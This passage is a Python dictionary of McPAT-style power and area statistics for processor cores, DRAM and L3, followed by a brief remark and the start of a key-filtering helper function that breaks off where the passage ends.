'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.090945,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.38282,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.107994,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.26079,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0243511,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00468532,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0427376,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0346508,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0670886,
'Execution Unit/Register Files/Runtime Dynamic': 0.0393361,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959712,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.241133,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.29,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000857234,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000346254,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000497762,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00326292,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00820552,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0333107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.11885,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100471,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.113138,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.4402,
'Instruction Fetch Unit/Runtime Dynamic': 0.258388,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0416661,
'L2/Runtime Dynamic': 0.0071598,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.36623,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.551646,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.53873,
'Load Store Unit/Runtime Dynamic': 0.768326,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0900756,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.180151,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0319681,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0325431,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.131742,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0166212,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.342767,
'Memory Management Unit/Runtime Dynamic': 0.0491642,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.2136,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0640563,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00581928,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0557547,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.12563,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.49867,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0081385,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.209081,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0433218,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0728882,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.117566,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0593433,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.249798,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.076721,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.04954,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00818442,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00305726,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0251803,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0226103,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0333647,
'Execution Unit/Register Files/Runtime Dynamic': 0.0256676,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0550829,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.134527,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.02445,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000791179,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000791179,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000701911,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00027872,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000324799,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00260907,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00712858,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0217359,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.38258,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0708791,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0738248,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.6682,
'Instruction Fetch Unit/Runtime Dynamic': 0.176177,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0403989,
'L2/Runtime Dynamic': 0.0107702,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.78528,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.279433,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0177343,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0177343,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.86903,
'Load Store Unit/Runtime Dynamic': 0.384627,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0437298,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0874596,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0155199,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0161203,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0859641,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0116382,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.268733,
'Memory Management Unit/Runtime Dynamic': 0.0277585,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.4854,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.02153,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00355053,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0366667,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0617472,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.68553,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.0716956857653095,
'Runtime Dynamic': 6.0716956857653095,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.305832,
'Runtime Dynamic': 0.0966954,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 72.1559,
'Peak Power': 105.268,
'Runtime Dynamic': 14.8707,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 71.85,
'Total Cores/Runtime Dynamic': 14.774,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.305832,
'Total L3s/Runtime Dynamic': 0.0966954,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
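The nested power figures above are keyed by slash-separated component paths (e.g. `'Load Store Unit/LoadQ/Peak Dynamic'`), so one sub-hierarchy can be sliced out of the flat mapping with a small helper. A minimal sketch — the trimmed `stats` sample reuses values from the data above, but the `field_for` helper itself is an illustrative assumption, not part of the reported output:

```python
# Hypothetical helper for McPAT-style flat dictionaries whose keys are
# slash-separated component paths, as in the statistics above.
def field_for(stats, component, field):
    """Return every `field` entry for `component` and its sub-components."""
    return {
        key: value
        for key, value in stats.items()
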